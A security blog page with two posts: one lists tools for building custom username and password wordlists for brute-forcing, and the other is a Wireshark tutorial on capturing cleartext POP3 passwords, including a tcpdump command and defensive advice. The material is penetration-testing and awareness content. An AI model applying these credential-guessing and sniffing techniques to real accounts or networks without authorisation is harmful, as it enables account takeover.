Creating custom username list & wordlist for bruteforciing.

<div dir="ltr" style="text-align: left;" trbidi="on"><div style="text-align: left;">During brute-forcing every time you need custom  password list & username list. Username list is as well as important as password list, it should be unique for every organization.If we use traditional large number of username list , then it will be tedious process.Custom username list also useful in <a href="http://tipstrickshack.blogspot.com/2013/11/username-enumeration-in-mutillidae.html">username enumeration</a>.</div><h3 style="text-align: left;">Creating custom username list:-</h3><div style="text-align: left;"><br />(1)<a href="https://github.com/pentestgeek/jigsaw" target="_blank">Jigsaw</a>:-</div><br />During <a href="http://tipstrickshack.blogspot.com/search/label/Information%20Gathering">information gathering</a> stage , you may use jigsaw script. It is great script for gathering employees `s details like fullname, position, department, email addresses.You should use script with your jigsaw credential.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieuLcSrq_SLhtQUOn72-6n19VbUtv_ORxyT1rOqTYkj5G9Oj7oB8yVHdvhgrLHOylbaLRhuXmrwhkwxgq33NmKk7Xoduk_QDjLdKbNAterHLqL2hr42aNO3zfXSPJ7bMZY_tlNeMRid8cJ/s1600/jigsaw.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="99" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieuLcSrq_SLhtQUOn72-6n19VbUtv_ORxyT1rOqTYkj5G9Oj7oB8yVHdvhgrLHOylbaLRhuXmrwhkwxgq33NmKk7Xoduk_QDjLdKbNAterHLqL2hr42aNO3zfXSPJ7bMZY_tlNeMRid8cJ/s320/jigsaw.PNG" width="320" /></a></div><br />some times email address`s initial can be username of employee.So you can get different username from output of jigsaw script.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhILb8exFjNJxHwZ7qIKjt1NNigKYM9AiUYUvNns3j4YqZFWh0z6kwqwY2Sl-rJPZYV7vQLMY3rd6SsD7XrhyJ3V5FSXjhNR7aOhOCowrVE5rm2pSivIec9Uftd0-lgbbwFbywOJtLoSOaP/s1600/jigsaw-3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhILb8exFjNJxHwZ7qIKjt1NNigKYM9AiUYUvNns3j4YqZFWh0z6kwqwY2Sl-rJPZYV7vQLMY3rd6SsD7XrhyJ3V5FSXjhNR7aOhOCowrVE5rm2pSivIec9Uftd0-lgbbwFbywOJtLoSOaP/s320/jigsaw-3.PNG" width="320" /></a></div><br />(2)Username script:-<br /><br />If you have full name of users then you can use <a href="http://blog.techorganic.com/2011/07/creating-user-name-list-for-brute-force.html">username.py</a> script to generate possible username by using different combination of first name & last name.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGN6OvcE1Ppy_QysMKMjSKp1JFgKm0N58i1yqkRsRzEmOjdK5d-SR_lh4K_P9nRZwDt8dK20FwB74gPw4gIkAe8N4Q-XteKpbma71d0uM7ySFaYSXBQmHnNjMqGcoEniHAwxk1d0_qs_PI/s1600/username.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGN6OvcE1Ppy_QysMKMjSKp1JFgKm0N58i1yqkRsRzEmOjdK5d-SR_lh4K_P9nRZwDt8dK20FwB74gPw4gIkAe8N4Q-XteKpbma71d0uM7ySFaYSXBQmHnNjMqGcoEniHAwxk1d0_qs_PI/s320/username.PNG" width="308" /></a></div><br />I also write <a href="http://pastebin.com/wzuUYPve">bash script</a> which generate possible username using first name, last name & birth date.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhShcl1Lqyus0LGwGqvxQ94GETGLVXxdy0iEVj_b5QbZvZXSPvWVaWGQai33dzL9GhrkjKujmcRH4nACwmAaFNmf0vnd_ksSdkHU3yw0nH9SvS4G-WcYiTCF_3DjYiahQ9Yji1of13eqW38/s1600/user-name.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhShcl1Lqyus0LGwGqvxQ94GETGLVXxdy0iEVj_b5QbZvZXSPvWVaWGQai33dzL9GhrkjKujmcRH4nACwmAaFNmf0vnd_ksSdkHU3yw0nH9SvS4G-WcYiTCF_3DjYiahQ9Yji1of13eqW38/s320/user-name.PNG" width="199" /></a></div><div style="text-align: left;"><br /><a name='more'></a></div><h3 style="text-align: left;">Creating Custom word list:-</h3><div style="text-align: left;"><br />(1)<a href="http://www.digininja.org/projects/cewl.php">Cewl</a>:-</div><div style="text-align: left;"><br />Custom Word List generator. <a href="http://www.digininja.org/projects/cewl.php">CeWL</a> is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words.</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK6DYSD6jJsuQl07VgrqHSgNn3gtFOM1_tnRMSgGiaVExA1AF2kt9prBb1OnmIqo_RG2PUfaK7XKrjdVhsHjNFXc4Gjs2F5YLdyN8AlLsxeNTMYq-r032ovNX5A6kqViihxi4-qiVAC08A/s1600/cewl.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="39" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK6DYSD6jJsuQl07VgrqHSgNn3gtFOM1_tnRMSgGiaVExA1AF2kt9prBb1OnmIqo_RG2PUfaK7XKrjdVhsHjNFXc4Gjs2F5YLdyN8AlLsxeNTMYq-r032ovNX5A6kqViihxi4-qiVAC08A/s320/cewl.PNG" width="320" /></a></div><div style="text-align: left;"><br /><br />(2)<a href="http://www.remote-exploit.org/content/wyd-0.2.tar.gz">Wyd</a>:-</div><div style="text-align: left;"><br /><a href="http://www.remote-exploit.org/content/wyd-0.2.tar.gz">wyd</a> is a password profiling tool that extracts words/strings from supplied files and directories. It parses files according to the file-types and extracts the useful information, e.g. song titles, authors and so on from mp3's or descriptions and titles from images.</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5kpsaEyQxrqlEwmMC_SyhAyUvMWAN9_mJCQil-dYrKWAoxOklCmeJp-Kj0fMopmjE0zGuRVhp34qBkmoCNNqOzIigDvrRdxKuEbdt3Q4aUuW_xY9LfyLpxgcs0eY-zCgaIMyaJi4k-gEA/s1600/wyd.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="144" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5kpsaEyQxrqlEwmMC_SyhAyUvMWAN9_mJCQil-dYrKWAoxOklCmeJp-Kj0fMopmjE0zGuRVhp34qBkmoCNNqOzIigDvrRdxKuEbdt3Q4aUuW_xY9LfyLpxgcs0eY-zCgaIMyaJi4k-gEA/s320/wyd.PNG" width="320" /></a></div><div style="text-align: left;"><br /></div><div style="text-align: left;"></div><div style="text-align: left;"><br />(3)<a href="http://www.remote-exploit.org/content/cupp-3.0.tar.gz">Cupp</a>:-</div><div class="separator" style="clear: both; text-align: center;"></div><div style="text-align: left;"><br />People spend a lot of time preparing for effective dictionary attack. <a href="http://www.remote-exploit.org/content/cupp-3.0.tar.gz">Common User Passwords Profiler (CUPP)</a> is made to simplify this attack method that is often used as last resort in penetration testing and forensic crime investigations. A weak password might be very short or only use alphanumeric characters, making decryption simple. A weak password can also be one that is easily guessed by someone profiling the user, such as a birthday, nickname, address, name of a pet or relative, or a common word such as God, love, money or password.</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9Z_MlW9Q1Zr6biCzPutjcuzDTp3PKeK65JKfm44AyXnyudoaQtIxh3KwcwlUp0lOfL273ozSOUOnGP4EOA_LDFK1GDgz-JIjYFMvFHRNHRpieqvayMTbC5VlbpDTyYTwuJgVsUSybubAi/s1600/cupp.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9Z_MlW9Q1Zr6biCzPutjcuzDTp3PKeK65JKfm44AyXnyudoaQtIxh3KwcwlUp0lOfL273ozSOUOnGP4EOA_LDFK1GDgz-JIjYFMvFHRNHRpieqvayMTbC5VlbpDTyYTwuJgVsUSybubAi/s320/cupp.PNG" width="303" /></a></div><div style="text-align: left;"></div></div>

Creating custom username list & wordlist for bruteforciing.

During brute-forcing every time you need custom  password list & username list. Username list is as well as important as password list, ...

+ Read more »

How To Capture Passwords Across The Air - Network Traffic Analysis

<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8qIauyhsd3uVeM8egNnOCwZnFVST23lJ7UqyGxNfh3N_MWHi9pR2Z_aEWZpzOdcNay6VbZERiDUi519-8AWGLEQSiq_kgBJYKrOavnnGXoq820-amJPiaR0JGofyePIr3Hdy4FLtYo6E/s1600/untitled.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8qIauyhsd3uVeM8egNnOCwZnFVST23lJ7UqyGxNfh3N_MWHi9pR2Z_aEWZpzOdcNay6VbZERiDUi519-8AWGLEQSiq_kgBJYKrOavnnGXoq820-amJPiaR0JGofyePIr3Hdy4FLtYo6E/s400/untitled.JPG" width="400" /></a></div><b><br /></b><b><br /></b><b>ABSTRACT</b></div><div style="text-align: left;"><b><br /></b></div>     It is known that WireShark is a powerful tool that goes far beyond a simple sniffer. What many do not know is that there are several ways to harness the potential of this tool and this is what this article aims at introducing the readers. We will learn to sniff the network effectively, create filters to find only the information we want, see it as a black hat would use this tool to steal passwords, and finally how to use WireShark to diagnose network problems or if a firewall is blocking packets correctly.<br /><a name='more'></a><br /><b>INTRODUCTION</b><br /><div style="text-align: left;"><b><br /></b></div>     Today it is very unlikely that your password will be brute forced. You use the internet regularly and one day you're surprised to receive allegations of an intrusion. Evidence indicates that the intruders third party accounts departed from your account, and you have no idea what is happening. Someone may have made use of your account and performed such acts as you. How could this have happened? A strong possibility is that you have become the victim of an attack via "sniffer".<br /><br /><div style="text-align: left;"><b>UNDERSTAND THE MAIN CONCEPT</b></div><div style="text-align: left;"><b><br /></b></div>     What are "sniffers"? The main purpose of a sniffer is to capture network traffic. They are used for network analysis purposes, however they can also be used by malicious hackers to capture your passwords, and even IDS systems are based on network sniffers.<br /><br />     These programs also allow you to monitor network activity recording data (usernames, passwords; ect.) each time they access other computers on the network.<br /><br />     These programs aim at monitoring ("sniffing") network traffic to capture access to network services, such as remote mail service (IMAP, POP3), remote access (telnet, rlogin, etc.), file transfer (FTP) etc.. accesses made, capturing packets. Always aimed at getting the most relevant information.<br />When we called the HUB computer and send information from one computer to another, in reality this data is for all ports of the HUB, and therefore for all machines. It turns out that only the machine on which the information was intended to send the operating system.<br /><br />     If a sniffer were running on other computers, even without these systems sending data it travels there for the operating system, the sniffer will intercept at the network layer, capturing the data and displaying them to the user, in an unfriendly way. Generally the data is organized by type of protocol (TCP, UDP, FTP, ICMP, etc...) and each package read may have show your content.<br /><br /><br /><div style="text-align: left;"><b>YOUR PASSWORD CAN BE CAPTURED BY SNIFFERS!</b></div><div style="text-align: left;"><b><br /></b></div>     Many local area networks (LANs) are configured sharing the same Ethernet segment. Virtually any computer of the network can run a "sniffer" program to "steal" users passwords. "Sniffers" work monitoring the flow of communication between computers on the network to find out when someone uses the network services previously mentioned. Each of these services uses a protocol that defines how a session is established, such as your account is identified and authenticated and how to use the service.<br />     To have access to these services, you first have to have a "log in". The login sequence - is part of the authentication protocol, which occurs at the beginning of each session - the "sniffers" are concerned about this, because it is this part that is your password. Therefore, it is only the filter "strings" keys that the password is obtained.<br /><br /><br /><div style="text-align: left;"><b>STEP BY STEP</b></div><br />     Currently, almost all environments use switches and not hubs, which makes sniffing a little more difficult because the switches do not send the data to all ports as a hub does, it sends directly to the port where the host destination is. So if you try to sniff a network switch you will only hear what is broadcast, or its own connection. To be able to hear everything without being the gateway of the network, an ARP spoof attack (aka ARP poisoning) is necessary, or burst the CAM table of the switch.<br /><br /><b>Basic Usage</b><br />     Now let's get our hands dirty: I'm assuming you already have the program (WireShark) installed, if you do not then download it. When starting WireShark, the displayed screen will look something like Figure 1:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihJuTJEl5kMHMRRO5NFTISnSTUkZ0LTkMJwRiLrwWrjWpr4mOGC6pEkRhlb3eSSRihGtPgAECxVUZWZOqIa-5PvUJPBoyFOvbX7qOrC9CgOOz0P5bAdp1nmeXLiXGHaIkLekaNrQpugRg/s1600/untitled1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihJuTJEl5kMHMRRO5NFTISnSTUkZ0LTkMJwRiLrwWrjWpr4mOGC6pEkRhlb3eSSRihGtPgAECxVUZWZOqIa-5PvUJPBoyFOvbX7qOrC9CgOOz0P5bAdp1nmeXLiXGHaIkLekaNrQpugRg/s640/untitled1.JPG" width="577" /></a></div><br />Figure 1) Wireshark.<br /><br />     Before you can start capturing packets, we have to define which interface will "listen" to the traffic. Click Capture > Interfaces<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEfum8KGAG-TJ42DayqavEmnYTFtHW6vUkGi036Q0aQ7VA3FxETfuMwQRRwdFV6TZ8P6AZeZUjjD4rkcxTo_CgrRDFjKMDgJA2ukoo9h-LNAE4gCTk8i39SRAZ2cFg-BbASWe4m3Bx-Pg/s1600/untitled2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEfum8KGAG-TJ42DayqavEmnYTFtHW6vUkGi036Q0aQ7VA3FxETfuMwQRRwdFV6TZ8P6AZeZUjjD4rkcxTo_CgrRDFjKMDgJA2ukoo9h-LNAE4gCTk8i39SRAZ2cFg-BbASWe4m3Bx-Pg/s1600/untitled2.JPG" /></a></div><br />Figure 2) Interfaces.<br /><br />     From there, a new window will appear with the list of automatically detected interfaces, simply select the desired interface by clicking the box next to the name of the interface, as in figure 3:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe9rBAPNzwc-2ozgY2E8WgVQgNuKvyyOT4J6IvWdMDWisJCX-UazZ3CAQCIIkz66iCOlXRMGj646th5OE0fl1T5qo5gKZ8Oy0JA19ar4UdHXTwHHbUXLGHQuOCJFlYX7E64aIElEcFTg8/s1600/untitled3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="171" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe9rBAPNzwc-2ozgY2E8WgVQgNuKvyyOT4J6IvWdMDWisJCX-UazZ3CAQCIIkz66iCOlXRMGj646th5OE0fl1T5qo5gKZ8Oy0JA19ar4UdHXTwHHbUXLGHQuOCJFlYX7E64aIElEcFTg8/s640/untitled3.JPG" width="577" /></a></div><br /><b>Figure 3) Capture Interfaces.</b><br /><br />     If you click Start, it will begin automatically capturing packets. You can select the interface and only then it will start the capture if necessary.<br />     When the capture process starts, you will see several packets traversing the screen WireShark (varying according to the traffic of your machine / network). Will look something like the figure 4:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkGaOXotlRNWA5OtNpJ82NjZV0TztUKGX0XXg3KzmxstVkH4rAxtPuKfIRJgYaU6nQstds8S4Ztioq5mQycPkOpMOPjitRwjUPzJG7gmqNZ7ZPv1IcHKLJknyK8orYvx5qCx5VENkjelg/s1600/untitled4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="321" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkGaOXotlRNWA5OtNpJ82NjZV0TztUKGX0XXg3KzmxstVkH4rAxtPuKfIRJgYaU6nQstds8S4Ztioq5mQycPkOpMOPjitRwjUPzJG7gmqNZ7ZPv1IcHKLJknyK8orYvx5qCx5VENkjelg/s640/untitled4.JPG" width="577" /></a></div><br /><b>Figure 4) Capturing.</b><br /><br />     To stop the capture, simply click the button, "Stop the running live capture".<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvSczTWHuAVuUWNWVXSmUWTnbdHoqPm6kRcyQpgdfbei2owKqX6WRYcXKVeaDJ3FfbKzzPtJdeDJua6z0-xVvF4fPkffjzSCfDyYvvw5kd8xBXDCCFmJ1Lfb5B5tKAjrMDdtu7ygx7ZLI/s1600/untitled5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="323" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvSczTWHuAVuUWNWVXSmUWTnbdHoqPm6kRcyQpgdfbei2owKqX6WRYcXKVeaDJ3FfbKzzPtJdeDJua6z0-xVvF4fPkffjzSCfDyYvvw5kd8xBXDCCFmJ1Lfb5B5tKAjrMDdtu7ygx7ZLI/s640/untitled5.JPG" width="577" /></a></div><br /><b>Figure 5) Stop.</b><br /><br />     It is important to remember that you must take care if your network is busy, the data stream may even lock your machine, then it is not advisable to leave the WireShark to capture for a long time, as we will see, we will leave it running only during the process to debug a connection. The greater the amount of packets, the longer it takes to apply a filter, find a package, etc.<br /><br />     With this we have the basics of the program, we can set the capture interface, start and stop the capture. The next step is to identify what interests among many packages. For this, we will start using filters.<br /><br /><b>Using Filters</b><br /><br />     There are a plethora of possible filters, but at this moment we will see just how to filter by IP address, port and protocol.<br />The filters can be constructed by clicking on "Filter", then selecting the desired filter (there is a short list of pre-defined filters), or by typing directly into the text box. After you create your filter, just click "Apply", if you wanted to see the entire list of packages again just click "Clear", this will remove the filter previously applied.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyIzVMIsAeOCglm2_jvRzqCsTb2CmLvFUx7nKZa-2GqYOiHx7OwXsXhaKeO6Tl3AwuWQNpW6vm51WN6RHNkqdZqPJFqirH7Q9cXKyTY9cAYuwB999fKGwXEtS8CyzuK5UmJa31S7vzExQ/s1600/untitled6.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="323" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyIzVMIsAeOCglm2_jvRzqCsTb2CmLvFUx7nKZa-2GqYOiHx7OwXsXhaKeO6Tl3AwuWQNpW6vm51WN6RHNkqdZqPJFqirH7Q9cXKyTY9cAYuwB999fKGwXEtS8CyzuK5UmJa31S7vzExQ/s640/untitled6.JPG" width="577" /></a></div><br />Figure 6) Filter.<br /><br /><br />     I will use a small filter list as an example:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiALcFIqbJyz8ZCst4arF-_x1aWXkefOfYFGhWrj7anoWoKdgPFDN7mlEWlTvwtr5YZr9R8BvPEmeu3a22cB4gfzZbo90tpWwYID6EHqSIizBOrSx8LOxAajUp_B89GtlVkvBvtCh9Xg84/s1600/untitled7.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="568" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiALcFIqbJyz8ZCst4arF-_x1aWXkefOfYFGhWrj7anoWoKdgPFDN7mlEWlTvwtr5YZr9R8BvPEmeu3a22cB4gfzZbo90tpWwYID6EHqSIizBOrSx8LOxAajUp_B89GtlVkvBvtCh9Xg84/s640/untitled7.JPG" width="577" /></a></div><br /><b>Figure 7) Example by Rafael Souza (RHA Infosec).</b><br /><br /><br />     It is also possible to group the filters, for example:<br /><span style="color: red;">ip.src == 10.10.10.1 && tcp.dstport==80 OR ip.src == 10.10.10.1 and tcp.dstport==80</span><br /><span style="color: red;"><br /></span><span style="color: red;">Source address 10.10.10.1 </span><br /><span style="color: red;">And destination port 80</span><br /><br /><br /><div style="text-align: left;"><b>CAPTURING PASSWORDS</b></div><br />     Now we will see how you can capture passwords easily, just by listening to traffic. For this example we will use the POP3 protocol, which sends the data in clear text over the network. To do this, start capturing packets normally and start a session with your POP3 email server. If you use a safer protocol like IMPAPS or POP3 and I just wanted to see the functioning of the mechanism, it is possible to connect via telnet to POP3 without having to add / modify your account, simply run the following:<br /><br /><span style="color: red;">telnet serveremail.com 110</span><br /><span style="color: red;">user user@rhainfosec.com</span><br /><span style="color: red;">pass rhainfosecpasswd</span><br /><br />     Now stop the capture, filter and put "pop" and then click "Apply". now thats done, you see only the packets of POP3 connection. Now click on any of them right, and then click "Follow TCP Stream".<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZkF882RL-5uZJHUS3IwMYAXYZ_sUenMn-A7dFQh7ZGVpWJAY-4bvxYBuut2zGBqHdDY6VFOOlgqmG7J-j-yUlaI1DwpclsblX9cPiv7LPGiu-90wPJYEm-NC8p9IeSgyZoLYMNM0uMdA/s1600/untitled8.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="324" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZkF882RL-5uZJHUS3IwMYAXYZ_sUenMn-A7dFQh7ZGVpWJAY-4bvxYBuut2zGBqHdDY6VFOOlgqmG7J-j-yUlaI1DwpclsblX9cPiv7LPGiu-90wPJYEm-NC8p9IeSgyZoLYMNM0uMdA/s640/untitled8.JPG" width="577" /></a></div><br />Figure POP3.<br />     With this we will open a new window with the entire contents of the ASCII connection. As the POP3 protocol sends everything in plain text, you can see all the commands executed, including the password.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoe5w-DOLNkwS-AqMhxqxXZDFY6pFqAMJPHvJkE-PX0LQcmvgfChTCukqwsyeYoQto5HGSioq1SNm5lMGXw-hrZRE0WGaw0I3zZR6TWGi4ZT28zCksCSJ-4n0AN5RBT-xpNMkkSl4Ozgg/s1600/untitled9.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="472" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoe5w-DOLNkwS-AqMhxqxXZDFY6pFqAMJPHvJkE-PX0LQcmvgfChTCukqwsyeYoQto5HGSioq1SNm5lMGXw-hrZRE0WGaw0I3zZR6TWGi4ZT28zCksCSJ-4n0AN5RBT-xpNMkkSl4Ozgg/s640/untitled9.JPG" width="577" /></a></div><br />Figure 9) Pass.<br /><br />     This can be transported to any connection in plain text, such as FTP, Telnet, HTTP, etc.. Just to let you change the filter and examine the contents of the connection.<br /><br /><b>Importing External Captures</b><br /><br />     Usually in servers, there is no graphical environment installed and with that you cannot use WireShark directly. If you want to analyze traffic on this server and you cannot install WireShark, so you have to capture this traffic elsewhere, the best one can do is write traffic with TCPdump locally and then copy this dump to a machine with WireShark from where a more detailed analysis is made.<br /><br />     We will capture everything that comes and goes from the host 10.10.10.1 with destination port 80 and save content in <span style="color: red;">capturerafaelsouzarhainfosec.pcap</span> file from the local folder where the command was executed. Run the server:<br /><span style="color: red;"><br /></span><span style="color: red;">tcpdump -i eth0 host 10.10.10.1 and dst </span><br /><span style="color: red;">port 80 -w </span><br /><span style="color: red;">capturerafaelsouzarhainfosec.pcap</span><br /><br />     Once you're finished capturing, simply use CTRL + C to copy the file to the machine WireShark capture and import by clicking on File -> Import. Once imported, you can use the program normally as if the capture had occurred locally.<br /><br /><br /><b>EVOLUTION OF THINKING</b><br /><br /><b><span style="color: lime;">Why steal your password?</span></b><br /><br />     There are various reasons that lead people to steal passwords from simply to annoy someone (sending email as you) up to perform illegal activities (invasion on other computers, theft of information, etc.) An attraction to crackers is the ability to use the identity of others in these activities.<br /><br />     One of the main reasons that attackers try to break systems and install "sniffers" is the ability to quickly capture the maximum number accounts. Thus, the more accounts this attacker has , the easier it is to hide your stash.<br /><br /><b><span style="color: lime;">How can you protect yourself?</span></b><br /><br />     Do not think that "sniffers" can make all the whole internet insecure. It is not so. You need to be aware of where the risk is , when you're at risk and what to do to be safe .<br /><br />     When you have your credit card stolen or suspect that someone may be using it improperly, you cancel the card. Likewise, as passwords can be stolen, it's critical that you replace it regularly. This precaution limites the amount of time that a stolen password can be used by an attacker.<br /><br />     Never share your password with others. This sharing makes it difficult to know where your password is being used (exposed) and is harder to detect unauthorized use. A password is like a tooth brush never share it and change it regularly.<br /><br />     Never give your password to anyone that is claiming they need access to fix your account problem or wanting to investigate the breach of a system. This trick is one of the most effective methods of hacking, known as "social engineering."<br /><br /><span style="color: lime;"><b>Use networks you can trust</b></span><br /><br />     Another aspect you should take into consideration is what network you can trust and which you cannot. If you are traveling and need to access an organizations computer remotely have a great level of assurance that the network is secure. For example, pick any file in your home directory that you share is it available to a "LanHouse" or network of another organization . Are you sure you can trust the network?<br /><br />     If you have no alternative for secure remote access and only have available resources such as telnet, for example, you can "mitigate" this effect by changing the password at the end of each session. Remember that only the first packet (200-300 bytes)of each session carry information from your "login". Therefore, to always change your password before logging out, this will not be captured and password before it that were exposed to the network are no longer valid. Of course it is possible to capture everything going across the network, but the attacker has no intention of filling their file system quickly and becoming so easily discovered.<br /><br /><span style="color: lime;"><b>Why are networks so vulnerable to "sniffers"?</b></span><br /><br />     There are several reasons and there is no quick solution to the problem.<br /><br />     Part of the problem is that companies tend to invest in more new features rather than add security. New security features can create the most difficult systems to configure and less convenient to use. Remember companies try to adhere to the C.I.A. triangle (confidentiality, integrity, and availability). New features create unintended effects on availability when this happens policy is overlooked creating a new vulnerability in itself.<br /><br />     Another part of the problem is related to added costs for Ethernet switches, hubs, network interfaces that do not support the particular "promiscuous" that sniffers can use.<br /><br /><br /><b>CONCLUSION</b><br /><br />     The question that remains is how can we protect ourselves from this threat...<br /><br /><br /><b>i) </b>Network cards that cannot be put into "promiscuous" mode. Thus, computers cannot be mastered and transformed into "sniffers".<br /><span class="Apple-tab-span" style="white-space: pre;"><br /></span><span class="Apple-tab-span"><b>ii)</b></span><span class="Apple-tab-span" style="white-space: pre;"> </span>Typically, the Ethernet interface only passes packets to the highest level protocol that are intended for local machine. Switching this interface into promiscuous mode allows all packets that are accepted and passed to the higher layer of the protocol stack. This allows the selection you want.<br /><span class="Apple-tab-span" style="white-space: pre;"><br /></span><span class="Apple-tab-span" style="white-space: pre;"><b>iii)</b> </span>Packages that encrypt data in transit over the network, thus avoiding to flow passwords "in the clear".<br /><br />     I would remind you that the safest thing to adopt and encourage the use of is software which enables remote access encrypted sessions, they help to make your environment much more secure.<br /><br />     One fairly common encryption technology currently in secure communication between remote machines SSH (Secure Shell). SSH is available for different platforms. Its use does not prevent the password captured, but as this is not an encrypted service to the attacker. SSH negotiates connections using RSA algorithm. Once the service is authenticated, all subsequent traffic is encrypted using IDEA technology. This type of encryption is very strong.<br /><br />     In the future, security will be increasingly intrinsic to the systems and infrastructure networks. No use having all the "apparatus" of security if you need, but do not use them. Security is not something that can be completely secure. Remember, no one is 100% secure.<br /><br />Thank you readers, it's always good to help my dear friend Rafay Baloch<br /><div><br /></div></div><h4 style="text-align: left;">ABOUT THE AUTHOR:</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW20uw8T8ysccUKPby8pUltzOvGP9SFROKU-o2mqHEuxLw9FUwB3OsaAAr535b818hL9f3KxihgWtIlfaPNaruznzRxx3X9NVNlCf8tFj19pIEDs2NMnIO2nT2U4oBsNSY23ZIVvbJfVZo/s200/desouze.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW20uw8T8ysccUKPby8pUltzOvGP9SFROKU-o2mqHEuxLw9FUwB3OsaAAr535b818hL9f3KxihgWtIlfaPNaruznzRxx3X9NVNlCf8tFj19pIEDs2NMnIO2nT2U4oBsNSY23ZIVvbJfVZo/s200/desouze.jpg" /></a></div><span style="background-color: white; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;">This is a guest post written by , </span><b style="background-color: white; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;">RAFAEL FONTES SOUZA</b><span style="background-color: white; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;">. He is the maintainer of the “</span><b style="background-color: white; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;">Project Backtrack Team Brazilian</b><span style="background-color: white; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;">”, He works at </span><a href="http://services.rafayhackingarticles.net/" style="background-color: white; color: #666666; font-family: Verdana; font-size: 12px; line-height: 19.1875px; text-decoration: none;" target="_blank">RHAinfosec </a><span style="background-color: white; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;">as a senior penetration tester. He is also the 